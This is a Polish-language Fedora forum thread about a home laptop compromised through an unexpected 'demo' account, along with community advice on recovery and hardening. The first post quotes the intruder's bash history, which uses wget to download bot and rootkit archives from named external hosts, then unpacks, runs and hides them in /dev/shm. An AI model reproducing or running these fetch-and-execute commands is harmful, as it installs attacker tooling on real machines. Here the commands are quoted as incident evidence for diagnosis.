Włam - Utworzony Nowy Użytkownik, Podmienione Usługi Httpd

[chyrus]

Na wstępie chciałbym się przywitać, więc witam serdecznie userów Fedory i Red Hata.

Jestem typowym, domowym użytkownikiem Fedory 11 64bit. Użytkuję Fedorę od wcześniejszych wersji, w sumie od roku czasu. Klepię co nieco w PHP, więc posiadam uruchomione na własne testowe potrzeby Apache, MySQL w podstawowej konfiguracji. Moje łącze internetowe to typowy DSL przez PPPoE. Komp, to laptop, nie jest wiecznie wpięty w net.

Nigdy nie miałem takich problemów jaki ostatnio mi się przytrafił, mianowicie, nagle w systemie pojawił mi się użytkownik "demo". Sprawdziłem jego bash-history i oto co zawiera:

 

cd /dev/shm
ps aux
mkdir "  "
cd "  "
wget members.lycos.co.uk/al3xsad/bot/alex.tgz; tar xzvf alex.tgz; rm -rf alex.tgz; cd " "
pico 1
wget http://www.geocities.com/dieiscute/pico.tgz; tar xzvf pico.tgz; rm -rf pico.tgz;  chmod +x *
./pico 1
ls a
cd -a
ls -a
cd ..
rm rf * .*
ls -all
wget geocities.com/rumby2001/mech.tar.gz
tar xvf mech.tar.gz
rm -rf mech.tar.gz
cd .b
ls -a
rm -rf evil.tar.gz
./start u?il?e
exit

 

Linków nie zmieniałem, działają, prowadzą do wielu "zabawek" uprzykrzających życie adminów i userów linucha. Sprawdziłem pobieżnie te, które zostału zaciągnięte do mnie. Min. podmienione httpd.

 

I teraz wnioski (pytania)

1. Czy ktoś z Was miał do czynienia z takim atakiem? Jak temu zaradzić?

2. Jak sprawdzić czy coś jeszcze nie pozostało po "demo" userze (usunąłem konto)?

3. Jak zbadać w jaki sposób ktoś założył konto w systemie?

4. Zapewne dobrze by było przeinstalowanie F11, a może jednak ratować podmienione usługi?

 

Mam nadzieję, że nie będziecie mieli takich problemów. Pozdrawiam serdecznie

 

PS. byłem już tu: http://forum.fedora.pl/index.php?showtopic=16560 i tu http://www.ducea.com/2006/07/17/how-to-res...d-linux-server/

[fafig]

po pierwsze to w /etc/hosts.deny zablokowac wszystkich procz localhosta. selinux dziala? firewall dziala? zablokowales porty? zabezpieczyles ssh? ustawiles limit polaczen np ilestam na minute ? najprosciej zweryfikowac wszytskie pakiety (man rpm). poczytaj tez o chkrootkit i dla wlasnego dobra nie podlaczaj go do sieci poki nie bedziesz miec pewnosci co sie stalo. miales troche pecha - script kiddie albo bot masz moze alias na dyndns lub podobnym serwisie ? musiales miec jakies porty pootwierane albo selinuxa wylaczonego (dla swietego spokoju na przyklad)

[grs_84pl]

Szyderczo wyśmieje kolegę, bo kiedyś mówiłem mu, że miałem podobną sytuację (u mnie przez SSH)

czyściłem usługi, sprawdzałem RPM'y,

Wszystko było od tego czasu ok, ale jakiś niesmak powstał... to jakby zdrada dziewczyny... niby wybaczyłeś, ale już nigdy w pełni nie zaufasz.

[fafig]

i to jest wlasnie przewalone. admin ma zabezpieczyc caly system, a wlamywaczowi wystarczy 1 luka. a ty czlowieku szukaj wiatru w polu ...

[@WalDo]

Wg mnie to najbezpieczniej jest przeinstalować system.

 

Nie jestem specem od bezpieczeństwa pomimo, że mam niezłą paranoję w temacie ale...

Po reinstalcji:

• Szybciutko skonfigurować iptables (domyślny firewall Fedory nie jest jakąś zaporą nie do przebycia ).
• W żadnym wypadku nie wyłączać SElinux.
• Nie działałać z konta root bez wyraźnej potrzeby.
• Nie nadawać zwykłemu użytkownikowi uprawnień do "sudo" w rodzaju "HansKloss ALL=(ALL) NOPASSWD:ALL".
• Poczytać - przed uruchomieniem usług - o zabezpieczeniach Apache, MySQL i PHP. A może jeśli to tylko dla celów deweloperskich, to warto zdać się na → XAMPP? Zapewnia podstawowy (bardzo podstawowy, ale lepszy niż żaden) zestaw zabezpieczeń serwera.

Uzupełnienia powyższej listy przez bardziej doświadczonych użytkowników mile widziane.

A może ktoś by napisał jakiś art na temat podstawowych zabezpieczeń serwera WWW do naszej wiki?

[borzole]

A pro po tematu:

http://dobreprogramy.pl/index.php?dz=15&am...+jadrze+Linuksa

...no i co teraz?

 

A w temacie:

dopóki nie wiesz jak właściwie się włamał, to reinstalacja jest trochę w ciemno, w końcu zawsze może to powtórzyć.

 

A może ktoś by napisał jakiś art na temat podstawowych zabezpieczeń serwera WWW do naszej wiki?

cizas, TAAAAK! W ogóle systemu. Najlepiej w postaci "Luka z 1000 i 1 głupoty która przegapiłeś". Może ci bardziej doświadczeni mogli by po prostu swoją ściągawkę zamieścić: "Co robię i dlaczego na nowej maszynie" ...pliss

[fafig]

taa pasowalo by wiedziec gdzie jest ten blad

 

wiszacy wskaznik znaleziony zostal w kodzie do urzadzeniu /dev/tun. czyli jak ktos nie uzywa xena lub bridge to raczej powinien sie czuc bezpiecznie tak mi sie wydaje klik!

@borzole

nie licz na cuda. moj post o partycjonowaniu dyskow umarl. nie pisna slowem i koniec. pozostaje samodzielna nauka...no ale coz zrobic. umiesz liczyc licz na siebie poza tym jak taki szanujacy sie admin super haker mialby sie znizac do naszego poziomu przeciez to trywialne jest ^^

[@WalDo]

dopóki nie wiesz jak właściwie się włamał, to reinstalacja jest trochę w ciemno, w końcu zawsze może to powtórzyć.

No i tyle razy edytowałem post, że w końcu wyszedłem na głupka.

Oczywiście przed przeinstalowaniem systemu należy zrobić kopię systemu aktualnego, czyli zaatakowanego.

Dobrze, że borzole czuwa

 

P.S. Chciałem dobrze wyszło jak zwykle. Podpisano: Adolf Hitler

 

[fafig]

moze cos a'la polska reprezentacja footballowa:

 

gralismy dobrze, przegralismy jak zwykle

[borzole]

zawsze mamy Wembley 73

 

@WalDo

ja chyba też, w końcu "to laptop" więc przeziębienie mógł złapać całkiem przypadkiem

 

[fafig]

poza tym laptop ktory nie jest za firewallem zadnym. inna rozmowa jakby mial bramke adsl z ap i lanem +fw.

[chyrus]

Szyderczo wyśmieje kolegę, bo kiedyś mówiłem mu, że miałem podobną sytuację (u mnie przez SSH)

czyściłem usługi, sprawdzałem RPM'y,

Wszystko było od tego czasu ok, ale jakiś niesmak powstał... to jakby zdrada dziewczyny... niby wybaczyłeś, ale już nigdy w pełni nie zaufasz.

 

Dzięki Tobie kolego szyderco miałem wyłączonego SeLinuxa

OS idzie do reinstalacji. Wolę nie zachodzić w głowie czy coś później nie wyskoczy. chkrootkit nic nie wykazał (używam od dawna). Również wydaje mi się, że to jakiś bot lub dzieciak, któremu się nudziło i znalazł na youtubie tutka i chce być hakeremadafakerem. Logi częściowo zostały uprzątnięte (np. historia logowań) przez włamywacza, więc nie mam pomysłu/wiedzy jak dalej szukać luki, przez którą się władował.

[fafig]

zweryfikuj jeszcze rpmy z opcja -V

 

 

rpm -V |sort > lista

[chyrus]

Nowa Fedora postawiona. Nawet nie zastanawiałem się nad ratowaniem rozprutej F11tki.

[dj_oko]

Pytam może post factum, ale pamiętasz może, do jakiej grupy należał uzytkownik 'demo'? Niedawno miałem do czynienia ze śmieciami z geocities(flood.tgz) i jestem ciekaw, czy to wszystko działa według tego samego scenariusza. Dla ciekawości dodam, że flood.tgz wykorzystywał błąd w kernelu,a zawierał narzędzia wręcz antyczne(1997), aczkolwiek wciąż działające. Protokół komunikacji - IRC. Bot.